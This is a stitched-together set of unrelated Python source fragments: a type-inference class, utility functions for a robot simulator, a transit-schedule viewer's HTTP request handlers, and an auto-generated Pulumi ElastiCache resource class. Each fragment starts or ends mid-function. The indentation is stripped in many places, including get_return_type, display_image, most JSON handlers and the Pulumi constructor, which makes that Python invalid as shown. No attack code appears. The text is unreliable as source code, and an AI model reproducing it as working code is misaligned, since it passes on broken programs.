        # Lazily materialize a fresh TypeVar on first access.
        if name not in self:
            self[name] = TypeVar(self.context, name)
        return super(TypeVarMap, self).__getitem__(name)

    def __setitem__(self, name, value):
        assert isinstance(name, str)
        if name in self:
            raise KeyError("Cannot redefine typevar %s" % name)
        super(TypeVarMap, self).__setitem__(name, value)
class TypeInferer(object):
"""
Operates on block that shares the same ir.Scope.
"""
def __init__(self, context, blocks):
    """Prepare an empty inference state for *blocks* (all sharing one ir.Scope)."""
    self.context = context
    self.blocks = blocks
    self.typevars = TypeVarMap()
    self.typevars.set_context(context)
    self.constrains = ConstrainNetwork()
    self.return_type = None
    # Set of assumed immutable globals
    self.assumed_immutables = set()
    # Track all calls; consumed later when building the call-type map.
    self.usercalls = []
    self.intrcalls = []
    self.setitemcalls = []
    self.setattrcalls = []
def dump(self):
    """Debug helper: pretty-print every type variable inferred so far."""
    print('---- type variables ----')
    pprint(list(six.itervalues(self.typevars)))
def seed_type(self, name, typ):
    """All arguments should be seeded.

    Locks the variable *name* to exactly *typ*.
    """
    self.typevars[name].lock(typ)
def seed_return(self, typ):
    """Seeding of return value is optional: lock the operand of every
    Return terminator to *typ*."""
    for block in utils.itervalues(self.blocks):
        term = block.terminator
        if isinstance(term, ir.Return):
            self.typevars[term.value.name].lock(typ)
def build_constrain(self):
    """Walk every statement of every block and register its constrains."""
    for block in utils.itervalues(self.blocks):
        for stmt in block.body:
            self.constrain_statement(stmt)
def propagate(self):
    """Run constrain propagation to a fixed point.

    The state token (derived from the typevar map) changes whenever any
    typeset grows; since typesets only grow and the universe of types is
    finite, the loop terminates.
    """
    newtoken = self.get_state_token()
    oldtoken = None
    if config.DEBUG:
        self.dump()
    # Since the number of types are finite, the typesets will eventually
    # stop growing.
    while newtoken != oldtoken:
        if config.DEBUG:
            print("propagate".center(80, '-'))
        oldtoken = newtoken
        self.constrains.propagate(self.context, self.typevars)
        newtoken = self.get_state_token()
        if config.DEBUG:
            self.dump()
def unify(self):
    """Collapse each variable's typeset to a single type.

    Returns (typdict, return type, call-site signature map).
    Raises TypeError for untyped variables and TypingError when a variable
    only unifies to the generic pyobject.
    """
    typdict = utils.UniqueDict()
    for var, tv in self.typevars.items():
        if len(tv) == 1:
            # Already a single candidate: take it directly.
            unified = tv.getone()
        elif len(tv) == 0:
            raise TypeError("Variable %s has no type" % var)
        else:
            unified = self.context.unify_types(*tv.get())
        # Falling back to pyobject means inference effectively failed.
        if unified == types.pyobject:
            raise TypingError("Var '%s' unified to object: %s" % (var, tv))
        typdict[var] = unified
    retty = self.get_return_type(typdict)
    fntys = self.get_function_types(typdict)
    return typdict, retty, fntys
def get_function_types(self, typemap):
    """Resolve a concrete signature for every recorded call site.

    *typemap* maps variable names to their unified types; the result maps
    each call/setitem/setattr instruction to its resolved signature.
    """
    calltypes = utils.UniqueDict()
    for call, args, kws in self.intrcalls:
        # Intrinsic operations carry the callee either as .fn (binops,
        # unary) or as the op name itself.
        if call.op in ('inplace_binop', 'binop', 'unary'):
            fnty = call.fn
        else:
            fnty = call.op
        args = tuple(typemap[a.name] for a in args)
        assert not kws
        signature = self.context.resolve_function_type(fnty, args, ())
        assert signature is not None, (fnty, args)
        calltypes[call] = signature
    for call, args, kws in self.usercalls:
        args = tuple(typemap[a.name] for a in args)
        if isinstance(call.func, ir.Intrinsic):
            # Intrinsic wrappers already carry a fixed signature.
            signature = call.func.type
        else:
            assert not kws
            fnty = typemap[call.func.name]
            signature = self.context.resolve_function_type(fnty, args, ())
            assert signature is not None, (fnty, args)
        calltypes[call] = signature
    for inst in self.setitemcalls:
        target = typemap[inst.target.name]
        index = typemap[inst.index.name]
        value = typemap[inst.value.name]
        signature = self.context.resolve_setitem(target, index, value)
        calltypes[inst] = signature
    for inst in self.setattrcalls:
        target = typemap[inst.target.name]
        attr = inst.attr
        value = typemap[inst.value.name]
        signature = self.context.resolve_setattr(target, attr, value)
        calltypes[inst] = signature
    return calltypes
def get_return_type(self, typemap):
rettypes = set()
for blk in utils.itervalues(self.blocks):
term = blk.terminator
if isinstance(term, ir.Return):
rettypes.add(typemap[term.value.name])
if types.none in rettypes:
# Special case None return
rettypes = rettypes - set([types.none])
if rettypes:
unified = self.context.unify_types(*rettypes)
return types.Optional(unified)
else:
| |
#!/usr/bin/env python
""" Utility module. All auxiliary functions go here.
This module provides internal functionalities for everything else, aside from
handling the internal details of running the simulation itself. There is a
plethora of varied functions, so it's best left alone unless strictly necessary.
Do not modify this module unless you know exactly what you are doing.
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = "<NAME>"
__authors__ = ["<NAME>"]
__contact__ = "<EMAIL>"
__copyright__ = "Copyright 2019, UAH"
__credits__ = ["<NAME>"]
__date__ = "2019/03/29"
__deprecated__ = False
__email__ = "<EMAIL>"
__license__ = "GPLv3"
__maintainer__ = "<NAME>"
__status__ = "Development"
__version__ = "0.0.2"
from PIL import Image, ImageDraw, ImageColor
import numpy as np
import pygame
from scipy import ndimage as filters
from matplotlib.pyplot import imshow
from scipy.stats import norm
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib.widgets import Button
import matplotlib as mpl
import time
import math
import json
import copy
from robot import Robot
import controller
from controllers.controllers import get_controllers
# --- Module-level simulation state, shared across functions via `global` ---
start_time = time.time()  # wall-clock reference for the once-per-second FPS report in animate()
last_call = time.time()   # timestamp of the previous update (used only by the legacy delta code)
frames = 0                # frames rendered since start_time was last reset
delta = 0                 # elapsed time between updates, fed to Robot.update()
pressed = []              # keys currently held down (appended by press(), cleared per loop)
labels = []               # cached text labels for the grid overlay
co2_center = (0, 0)       # world coordinates of the simulated CO2 source
scale = 1                 # factor applied to distances before evaluating the CO2 pdf
grid_size = []            # grid cell size; empty list disables the grid overlay
ax = None                 # matplotlib axes (legacy plotting backend)
frozen_dist = None        # frozen scipy.stats distribution used by get_reading()
fig = None                # matplotlib figure (legacy plotting backend)
npdata = None             # stage bitmap as a numpy array (obstacle map)
gui = True                # whether to run with the pygame window
show_robot = True         # whether robots are drawn/updated each frame
button = None             # matplotlib button widget (legacy plotting backend)
showFPS = False           # print frames-per-second once per second when True
run = True                # main-loop flag; cleared by handle_close()
screen = None             # pygame display surface
clock = None              # pygame clock used to throttle and time the loop
def switch_show_robot(dummy):
    """Toggle whether the robot is displayed and updated.

    Intended primarily as a button callback, hence the single (ignored)
    positional argument required by Matplotlib. Can also be called before
    the simulation starts so the corresponding button shows up.
    """
    global show_robot
    show_robot ^= True
def press(event):
    """Record a key press in the module-level `pressed` list.

    Must be registered as a key handler; `event` needs a `.key` attribute.
    """
    # `pressed` is only mutated (append), so no `global` declaration is needed.
    pressed.append(event.key)
def calculate_delta():
    """Return the time elapsed since the previous frame.

    Delegates to the pygame clock (module global), which also caps the
    framerate at 30 FPS. The result is stored in the module-level ``delta``
    as a side effect and returned.

    Note: the previous hand-rolled time.time() implementation was dead code
    (kept as an inert string literal) and has been removed.
    """
    global clock, delta
    delta = clock.tick(30)
    return delta
def generate_dist(size = 1):
    """(Re)create the frozen normal distribution used for CO2 readings.

    Sets the module-level ``scale`` to 1/size; get_reading() multiplies the
    distance by ``scale`` before evaluating the pdf, so the frozen
    distribution is deliberately the *standard* normal.

    Bug fix: the former ``norm.stats(scale=scale)`` call was a no-op — it
    merely computes moments and its return value was discarded — so it has
    been removed.
    """
    global frozen_dist, scale
    scale = 1 / size
    frozen_dist = norm()
def get_reading(x, y):
    """Return the simulated CO2 sensor reading at world position (x, y).

    Lazily creates the frozen distribution on first use, then evaluates its
    pdf at the scaled euclidean distance from the CO2 source.
    """
    global frozen_dist
    if frozen_dist is None:
        generate_dist(1000)
    dx = co2_center[0] - x
    dy = co2_center[1] - y
    distance = np.linalg.norm((dx, dy))
    return frozen_dist.pdf(distance * scale)
def create_controllers():
    """Instantiate the controller(s) described by the global config.

    Inputs:
        - No input, everything comes from the config global variable.
    Outputs:
        - a fully configured Controller object or a list of Controllers,
          depending on the config.
    Raises:
        KeyError: if the config defines neither "class" nor "controllers".
    """
    # Removed an unused `global npdata` declaration (npdata is never
    # referenced in this function).
    if 'class' in config or 'controllers' in config:
        return get_controllers(config)
    else:
        # Message now names both accepted keys, matching the check above.
        raise KeyError("The configuration file received doesn't contain a \"class\" or \"controllers\" attribute")
def create_robot(json_file = '../conf/robot.json', controller = None):
    """
    Uses a json file to generate a fully configured Robot object.
    Inputs:
        - json_file: path to the JSON configuration file for the robot in question.
        - controller: pre-configured Controller object.
    Outputs:
        - fully configured Robot object.
    """
    with open(json_file, 'r') as fp:
        f = json.load(fp)
    # Build the constructor arguments once instead of duplicating the whole
    # Robot(...) call; 'name' is the only optional constructor field.
    kwargs = {
        'identifier': f['id'],
        'x': f['x'],
        'y': f['y'],
        'orientation': f['orientation'],
        'vision_range': (f['sonar_range'][0], f['sonar_range'][1]),
        'sensors': f['sonars'],
        'radius': f['radius'],
        'max_speed': f['max_speed'],
        'controller': controller,
    }
    if 'name' in f:
        kwargs['name'] = f['name']
    r = Robot(**kwargs)
    if 'battery' in f:
        # Battery configuration is all-or-nothing: these keys are expected
        # together whenever 'battery' is present.
        r.insert_battery_details(f['step'], f['battery'], f['charging_rate'],
                                 f['movement_cost'], f['reading_cost'],
                                 f['picture_cost'], f['generic_cost'])
    if 'color' in f:
        r.set_color(f['color'])
    return r
def init_globals_from_config():
    """
    Initialize the module-level globals based on config.

    Bug fix: the assignments previously created function-local variables
    because the names were not declared ``global``, so the configured values
    for showFPS, gui and co2_center silently never took effect.

    TODO: Remove global variables and keep only the config dict, to at some point remove it too and pass it as reference if needed
    """
    global showFPS, gui, co2_center
    showFPS = 'fps' in config
    gui = config['gui']
    co2_center = config['co2_center'] if 'co2_center' in config else (0, 0)
def create_robots(controllers):
    """Build one robot per entry in config['robot'], or a single robot.

    When there are more robot definitions than controllers, the first
    controller is reused for the extra robots.
    (TBC, Pedro) Why did we do a deepcopy of the controller config only when
    we received 1 controller, but not when multiple? If this is still a
    requirement, we need to add it to the append below.
    """
    paths = config['robot']
    if type(paths) is list:
        robots = []
        for idx, path in enumerate(paths):
            ctrl = controllers[idx] if idx < len(controllers) else controllers[0]
            robots.append(create_robot(path, ctrl))
        return robots
    return create_robot(paths, controllers[0])
def load_simulation(config_mgr):
    """
    Loads a simulation using a configuration file. For the time being, it limits itself to loading the corresponding map and robot.
    Inputs:
        - config_mgr: configuration manager; its get_config() must return a dict
          containing the following:
            * stage: string defining the path to the image file that represents the stage to be loaded.
            * robot: string defining the path to the configuration file of the robot that will be used.
            * gui: whether to run with the pygame window.
          and optionally 'fps', 'co2_center' and 'co2_radius'.
    """
    global gui, npdata, co2_center, showFPS, config
    # Load the config in the global variable
    config = config_mgr.get_config()
    # Init global variables based on config dict
    # TODO: I think we should refactor everything to only use config as global (Pedro)
    init_globals_from_config()
    # Load the image used in the stage
    npdata = load_image(config['stage'])
    # Get the controller if only one or a list of controllers
    controllers = create_controllers()
    if 'co2_radius' in config:
        # Re-freeze the CO2 distribution with the configured radius.
        generate_dist(config['co2_radius'])
    robots = create_robots(controllers)
    # Hands control over to the blocking pygame loop.
    display_image(robots)
def update_loop(robots, npdata):
    """Drive the simulation until the module-level `run` flag is cleared.

    Each iteration advances every robot by one step: the step length comes
    from the pygame clock when a GUI is present, otherwise a fixed 0.1 s is
    used. Pressed keys are consumed once per iteration and the loop is
    throttled to at most ~80 iterations per second.

    Removed the unused local `init_time` (assigned but never read).
    """
    global delta, pressed, run
    while run:
        if gui:
            delta = calculate_delta()
        else:
            delta = 0.1
        for r in robots:
            r.update(npdata, delta, True)
        pressed.clear()
        time.sleep(1 / 80)
def update(robots, npdata):
    """Advance every robot by one frame, converting the clock delta to seconds."""
    # Note: the step is a local value; the module-level `delta` (set inside
    # calculate_delta) keeps the raw millisecond reading.
    step = calculate_delta() / 1000
    for robot in robots:
        robot.update(npdata, step, True)
def animate(robots):
    """
    Update function. Updates internal world data, then prints it to a plot.
    Must be registered to said plot.

    Draws, for each robot: its detected-edge rays and edge markers (when the
    controller exposes them), the robot body, and a heading line. Also keeps
    the once-per-second FPS report. Each robot's lock is held while drawing it.
    """
    global start_time, frames, delta, show_robot, screen, clock, grid_size
    if show_robot:
        for r in robots:
            r.get_lock().acquire()
            if r.controller.has_cur_detected_edge_list():
                '''for e in r.controller.detected_edges:
                    pygame.draw.circle(screen, r.color, (int(e[0]), int(e[1])), 1)'''
                # Draw a magenta ray per sensor, with the length of the
                # distance measured at that sensor angle.
                for a in r.controller.actual_sensor_angles:
                    dstX = r.x + np.cos(np.radians(a)) * r.controller.cur_detected_edges_distances[r.controller.actual_sensor_angles.index(a)]
                    dstY = r.y + np.sin(np.radians(a)) * r.controller.cur_detected_edges_distances[r.controller.actual_sensor_angles.index(a)]
                    pygame.draw.line(screen, (255, 0, 255), (int(r.x), int(r.y)), (int(dstX), int(dstY)), 1)
                # Mark each detected edge; the marker shrinks with distance.
                for e in r.controller.cur_detected_edges:
                    pygame.draw.circle(screen, (0, 255, 0), (int(e[0]), int(e[1])), int((100/np.linalg.norm((e[0]-r.x, e[1]-r.y)))/90))
            if type(r.color) is str:
                # Lazily convert a named matplotlib color to a pygame RGB
                # tuple (0-255) the first time it is seen.
                r.color = list(mpl.colors.to_rgb(mpl.colors.get_named_colors_mapping()[r.color]))
                r.color[0] *= 255
                r.color[1] *= 255
                r.color[2] *= 255
                r.color = tuple(r.color)
            # Robot body plus a heading line twice the radius long.
            pygame.draw.circle(screen, r.color, (int(r.x), int(r.y)), int(r.radius))
            dstX = r.x + np.cos(np.radians(r.orientation)) * 2 * r.radius
            dstY = r.y + np.sin(np.radians(r.orientation)) * 2 * r.radius
            pygame.draw.line(screen, r.color, (int(r.x), int(r.y)), (int(dstX), int(dstY)), 1)
            r.get_lock().release()
    # FPS bookkeeping: report (if enabled) and reset once per second.
    # NOTE(review): grid_size is declared global above but never used here.
    end_time = time.time()
    frames += 1
    if (end_time - start_time) >= 1:
        if showFPS:
            print("FPS: ", clock.get_fps())
        start_time = time.time()
        frames = 0
def load_image(infilename):
    """Load an image as grayscale and return it as an int32 numpy array."""
    grayscale = Image.open(infilename).convert("L")
    grayscale.load()
    return np.asarray(grayscale, dtype="int32")
def handle_close(evt):
    """Window-close callback: clear the main-loop flag so the loops exit."""
    global run
    run = False
def display_image(r):
"""
Driver function that starts the simulation, after being provided an image to use as stage.
"""
global screen, npdata, show_robot, clock, labels, co2_center
img = Image.fromarray(np.asarray(np.clip(npdata,0,255), dtype="uint8"), "L")
img = img.convert("RGB")
robots = []
if type(r) is list:
robots = r
else:
robots.append(r)
for robot in robots:
if robot.controller.goal_oriented():
robot.set_position(robot.controller.goal[0][0], robot.controller.goal[0][1])
npdata = np.rot90(npdata)
npdata = np.flipud(npdata)
if gui:
pygame.init()
pygame.display.set_caption("R2P2")
clock = pygame.time.Clock()
size = img.size
img = pygame.image.fromstring(img.tobytes("raw", 'RGB'), size, 'RGB')
screen = pygame.display.set_mode(size)
font = pygame.font.SysFont("BitstreamVeraSans Roman", 23)
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
return
if event.type == pygame.KEYDOWN:
press(event)
if event.type == pygame.KEYUP:
if event.key in pressed:
pressed.remove(event.key)
update(robots, npdata)
screen.fill((0, 0, 0))
screen.blit(img, (0, 0))
if grid_size:
grid_color = (150, 150, 150)
font_size = round((grid_size[0]+grid_size[1]) // 2)
if font_size > min(grid_size):
font_size = int(min(grid_size))
label_font = pygame.font.SysFont("BitstreamVeraSans Roman", font_size)
tolerance = 12
offset_x = round(grid_size[0]/2)
offset_y | |
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An example application that uses the transitfeed module.
You must provide a Google Maps API key.
"""
from __future__ import print_function
import BaseHTTPServer, sys, urlparse
import bisect
from gtfsscheduleviewer.marey_graph import MareyGraph
import gtfsscheduleviewer
import mimetypes
import os.path
import re
import signal
import json as simplejson
import socket
import time
import transitfeed
from transitfeed import util
import urllib
# By default Windows kills Python with Ctrl+Break. Instead make Ctrl+Break
# raise a KeyboardInterrupt.
if hasattr(signal, 'SIGBREAK'):
  signal.signal(signal.SIGBREAK, signal.default_int_handler)
# Serve .vbs files as plain text (the extension is not in the default table).
mimetypes.add_type('text/plain', '.vbs')
class ResultEncoder(simplejson.JSONEncoder):
  """JSON encoder that additionally serializes arbitrary iterables as lists."""
  def default(self, obj):
    # Only a TypeError from iter() itself means "not iterable"; in that case
    # defer to the base class (which raises the standard serialization error).
    try:
      iterator = iter(obj)
    except TypeError:
      return simplejson.JSONEncoder.default(self, obj)
    return list(iterator)
# Code taken from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/425210/index_txt
# An alternate approach is shown at
# http://mail.python.org/pipermail/python-list/2003-July/212751.html
# but it requires multiple threads. A sqlite object can only be used from one
# thread.
class StoppableHTTPServer(BaseHTTPServer.HTTPServer):
  """HTTPServer that another thread can stop via stop().

  The listening socket is given a 1 second timeout so the accept loop in
  get_request() periodically re-checks the _run flag.
  """
  def server_bind(self):
    # Bind as usual, then arm the accept timeout and the run flag.
    BaseHTTPServer.HTTPServer.server_bind(self)
    self.socket.settimeout(1)
    self._run = True

  def get_request(self):
    # Accept with a timeout so a stop() call is noticed within a second.
    while self._run:
      try:
        sock, addr = self.socket.accept()
      except socket.timeout:
        continue
      sock.settimeout(None)
      return (sock, addr)

  def stop(self):
    # Ask both the serve loop and the accept loop to wind down.
    self._run = False

  def serve(self):
    # Handle requests until stop() clears the flag.
    while self._run:
      self.handle_request()
def StopToTuple(stop):
  """Return tuple as expected by javascript function addStopMarkerFromList"""
  lat = float(stop.stop_lat)
  lon = float(stop.stop_lon)
  return (stop.stop_id, stop.stop_name, lat, lon, stop.location_type)
class ScheduleRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  def do_GET(self):
    """Route a GET request to the matching handle_* method.

    Dispatch order: '/' -> home page; '/json/<name>' -> handle_json_GET_<name>
    wrapped in JSON output; '/file/<name>' -> static file; '/<name>' ->
    handle_GET_<name>; anything else -> handle_GET_default (404).
    """
    # NOTE: with this unpacking, `params` receives urlparse's *query string*
    # component and `x` the rarely-used path-params component.
    scheme, host, path, x, params, fragment = urlparse.urlparse(self.path)
    # Decode the query string into a dict of unicode values.
    parsed_params = {}
    for k in params.split('&'):
      k = urllib.unquote(k)
      if '=' in k:
        k, v = k.split('=', 1)
        parsed_params[k] = unicode(v, 'utf8')
      else:
        parsed_params[k] = ''
    if path == '/':
      return self.handle_GET_home()
    # JSON API endpoints: /json/<lowercase name>.
    m = re.match(r'/json/([a-z]{1,64})', path)
    if m:
      handler_name = 'handle_json_GET_%s' % m.group(1)
      handler = getattr(self, handler_name, None)
      if callable(handler):
        return self.handle_json_wrapper_GET(handler, parsed_params)
    # Restrict allowable file names to prevent relative path attacks etc
    m = re.match(r'/file/([a-z0-9_-]{1,64}\.?[a-z0-9_-]{1,64})$', path)
    if m and m.group(1):
      try:
        f, mime_type = self.OpenFile(m.group(1))
        return self.handle_static_file_GET(f, mime_type)
      except IOError as e:
        print("Error: unable to open %s" % m.group(1))
        # Ignore and treat as 404
    # Plain page endpoints: /<lowercase name>.
    m = re.match(r'/([a-z]{1,64})', path)
    if m:
      handler_name = 'handle_GET_%s' % m.group(1)
      handler = getattr(self, handler_name, None)
      if callable(handler):
        return handler(parsed_params)
    return self.handle_GET_default(parsed_params, path)
def OpenFile(self, filename):
"""Try to open filename in the static files directory of this server.
Return a tuple (file object, string mime_type) or raise an exception."""
(mime_type, encoding) = mimetypes.guess_type(filename)
assert mime_type
# A crude guess of when we should use binary mode. Without it non-unix
# platforms may corrupt binary files.
if mime_type.startswith('text/'):
mode = 'r'
else:
mode = 'rb'
return open(os.path.join(self.server.file_dir, filename), mode), mime_type
  def handle_GET_default(self, parsed_params, path):
    """Fallback for unrecognized paths: respond with a 404."""
    self.send_error(404)
def handle_static_file_GET(self, fh, mime_type):
content = fh.read()
self.send_response(200)
self.send_header('Content-Type', mime_type)
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
  def AllowEditMode(self):
    """Return False: editing is disabled in this handler.

    handle_GET_home uses this to fill the 'forbid_editing' template value.
    """
    return False
  def handle_GET_home(self):
    """Serve index.html with its [placeholder] values filled in."""
    schedule = self.server.schedule
    (min_lat, min_lon, max_lat, max_lon) = schedule.GetStopBoundingBox()
    forbid_editing = ('true', 'false')[self.AllowEditMode()]
    agency = ', '.join(a.agency_name for a in schedule.GetAgencyList()).encode('utf-8')
    key = self.server.key
    host = self.server.host
    # A very simple template system. For a fixed set of values replace [xxx]
    # with the value of local variable xxx
    # NOTE: the replacement reads locals()[v], so the local variable names
    # above must match the bracketed placeholders — do not rename them.
    f, _ = self.OpenFile('index.html')
    content = f.read()
    for v in ('agency', 'min_lat', 'min_lon', 'max_lat', 'max_lon', 'key',
              'host', 'forbid_editing'):
      content = content.replace('[%s]' % v, str(locals()[v]))
    self.send_response(200)
    self.send_header('Content-Type', 'text/html')
    self.send_header('Content-Length', str(len(content)))
    self.end_headers()
    self.wfile.write(content)
  def handle_json_GET_routepatterns(self, params):
    """Given a route_id generate a list of patterns of the route. For each
    pattern include some basic information and a few sample trips.

    Each pattern is a tuple (name, pattern_id, start_sample_index, sample,
    num_after_sample, has_non_zero_trip_type as 0/1); `sample` holds up to
    `sample_size` (start_time, trip_id) pairs starting at or after the
    'time' query param. Trips not active on the 'date' param are skipped.
    """
    schedule = self.server.schedule
    route = schedule.GetRoute(params.get('route', None))
    if not route:
      self.send_error(404)
      return
    # NOTE: `time` here shadows the imported time module for this method.
    time = int(params.get('time', 0))
    date = params.get('date', "")
    sample_size = 3  # For each pattern return the start time for this many trips
    pattern_id_trip_dict = route.GetPatternIdTripDict()
    patterns = []
    for pattern_id, trips in pattern_id_trip_dict.items():
      time_stops = trips[0].GetTimeStops()
      if not time_stops:
        continue
      has_non_zero_trip_type = False;
      # Iterating over a copy so we can remove from trips inside the loop
      # NOTE(review): the code actually builds a filtered list rather than
      # removing in place; the comment above looks stale.
      trips_with_service = []
      for trip in trips:
        service_id = trip.service_id
        service_period = schedule.GetServicePeriod(service_id)
        if date and not service_period.IsActiveOn(date):
          continue
        trips_with_service.append(trip)
        if trip['trip_type'] and trip['trip_type'] != '0':
          has_non_zero_trip_type = True
      # We're only interested in the trips that do run on the specified date
      trips = trips_with_service
      # Pattern display name: first stop, last stop, stop count.
      name = u'%s to %s, %d stops' % (time_stops[0][2].stop_name, time_stops[-1][2].stop_name, len(time_stops))
      transitfeed.SortListOfTripByTime(trips)
      num_trips = len(trips)
      if num_trips <= sample_size:
        start_sample_index = 0
        num_after_sample = 0
      else:
        # Will return sample_size trips that start after the 'time' param.
        # Linear search because I couldn't find a built-in way to do a binary
        # search with a custom key.
        start_sample_index = len(trips)
        for i, trip in enumerate(trips):
          if trip.GetStartTime() >= time:
            start_sample_index = i
            break
        num_after_sample = num_trips - (start_sample_index + sample_size)
        if num_after_sample < 0:
          # Less than sample_size trips start after 'time' so return all the
          # last sample_size trips.
          num_after_sample = 0
          start_sample_index = num_trips - sample_size
      sample = []
      for t in trips[start_sample_index:start_sample_index + sample_size]:
        sample.append( (t.GetStartTime(), t.trip_id) )
      patterns.append((name, pattern_id, start_sample_index, sample,
                       num_after_sample, (0,1)[has_non_zero_trip_type]))
    patterns.sort()
    return patterns
def handle_json_wrapper_GET(self, handler, parsed_params):
"""Call handler and output the return value in JSON."""
schedule = self.server.schedule
result = handler(parsed_params)
content = ResultEncoder().encode(result)
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
def handle_json_GET_routes(self, params):
"""Return a list of all routes."""
schedule = self.server.schedule
result = []
for r in schedule.GetRouteList():
result.append( (r.route_id, r.route_short_name, r.route_long_name) )
result.sort(key = lambda x: x[1:3])
return result
def handle_json_GET_routerow(self, params):
schedule = self.server.schedule
route = schedule.GetRoute(params.get('route', None))
return [transitfeed.Route._FIELD_NAMES, route.GetFieldValuesTuple()]
def handle_json_GET_triprows(self, params):
"""Return a list of rows from the feed file that are related to this
trip."""
schedule = self.server.schedule
try:
trip = schedule.GetTrip(params.get('trip', None))
except KeyError:
# if a non-existent trip is searched for, the return nothing
return
route = schedule.GetRoute(trip.route_id)
trip_row = dict(trip.iteritems())
route_row = dict(route.iteritems())
return [['trips.txt', trip_row], ['routes.txt', route_row]]
def handle_json_GET_tripstoptimes(self, params):
schedule = self.server.schedule
try:
trip = schedule.GetTrip(params.get('trip'))
except KeyError:
# if a non-existent trip is searched for, the return nothing
return
time_stops = trip.GetTimeStops()
stops = []
arrival_times = []
departure_times = []
for arr,dep,stop in time_stops:
stops.append(StopToTuple(stop))
arrival_times.append(arr)
departure_times.append(dep)
return [stops, arrival_times, departure_times]
def handle_json_GET_tripshape(self, params):
schedule = self.server.schedule
try:
trip = schedule.GetTrip(params.get('trip'))
except KeyError:
# if a non-existent trip is searched for, the return nothing
return
points = []
if trip.shape_id:
shape = schedule.GetShape(trip.shape_id)
for (lat, lon, dist) in shape.points:
points.append((lat, lon))
else:
time_stops = trip.GetTimeStops()
for arr,dep,stop in time_stops:
points.append((stop.stop_lat, stop.stop_lon))
route = schedule.GetRoute(trip.route_id)
polyline_data = {'points': points}
if route.route_color:
polyline_data['color'] = '#' + route.route_color
return polyline_data
def handle_json_GET_neareststops(self, params):
"""Return a list of the nearest 'limit' stops to 'lat', 'lon'"""
schedule = self.server.schedule
lat = float(params.get('lat'))
lon = float(params.get('lon'))
limit = int(params.get('limit'))
stops = schedule.GetNearestStops(lat=lat, lon=lon, n=limit)
return [StopToTuple(s) for s in stops]
def handle_json_GET_boundboxstops(self, params):
"""Return a list of up to 'limit' stops within bounding box with 'n','e'
and 's','w' in the NE and SW corners. Does not handle boxes crossing
longitude line 180."""
schedule = self.server.schedule
n = float(params.get('n'))
e = float(params.get('e'))
s = float(params.get('s'))
w = float(params.get('w'))
limit = int(params.get('limit'))
stops = schedule.GetStopsInBoundingBox(north=n, east=e, south=s, west=w, n=limit)
return [StopToTuple(s) for s in stops]
def handle_json_GET_stopsearch(self, params):
schedule = self.server.schedule
query = params.get('q', None).lower()
matches = []
for s in schedule.GetStopList():
if s.stop_id.lower().find(query) != -1 or s.stop_name.lower().find(query) != -1:
matches.append(StopToTuple(s))
return matches
def handle_json_GET_stoptrips(self, params):
"""Given a stop_id and time in seconds since midnight return the next
trips to visit the stop."""
schedule = self.server.schedule
stop = schedule.GetStop(params.get('stop', None))
time = int(params.get('time', 0))
date = params.get('date', "")
time_trips = stop.GetStopTimeTrips(schedule)
time_trips.sort() # OPT: use bisect.insort to make this O(N*ln(N)) -> O(N)
# Keep the first 5 after param 'time'.
# Need make a tuple to find correct bisect point
time_trips = time_trips[bisect.bisect_left(time_trips, (time, 0)):]
time_trips = time_trips[:5]
# TODO: combine times for a route to show next 2 departure times
result = []
for time, (trip, index), tp in time_trips:
service_id = trip.service_id
service_period = schedule.GetServicePeriod(service_id)
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
class ReplicationGroup(pulumi.CustomResource):
"""
Provides an ElastiCache Replication Group resource.
For working with Memcached or single primary Redis instances (Cluster Mode Disabled), see the
[`aws_elasticache_cluster` resource](/docs/providers/aws/r/elasticache_cluster.html).
"""
def __init__(__self__, __name__, __opts__=None, apply_immediately=None, at_rest_encryption_enabled=None, auth_token=None, auto_minor_version_upgrade=None, automatic_failover_enabled=None, availability_zones=None, cluster_mode=None, engine=None, engine_version=None, maintenance_window=None, node_type=None, notification_topic_arn=None, number_cache_clusters=None, parameter_group_name=None, port=None, replication_group_description=None, replication_group_id=None, security_group_ids=None, security_group_names=None, snapshot_arns=None, snapshot_name=None, snapshot_retention_limit=None, snapshot_window=None, subnet_group_name=None, tags=None, transit_encryption_enabled=None):
"""Create a ReplicationGroup resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, basestring):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if apply_immediately and not isinstance(apply_immediately, bool):
raise TypeError('Expected property apply_immediately to be a bool')
__self__.apply_immediately = apply_immediately
"""
Specifies whether any modifications are applied immediately, or during the next maintenance window. Default is `false`.
"""
__props__['applyImmediately'] = apply_immediately
if at_rest_encryption_enabled and not isinstance(at_rest_encryption_enabled, bool):
raise TypeError('Expected property at_rest_encryption_enabled to be a bool')
__self__.at_rest_encryption_enabled = at_rest_encryption_enabled
"""
Whether to enable encryption at rest.
"""
__props__['atRestEncryptionEnabled'] = at_rest_encryption_enabled
if auth_token and not isinstance(auth_token, basestring):
raise TypeError('Expected property auth_token to be a basestring')
__self__.auth_token = auth_token
"""
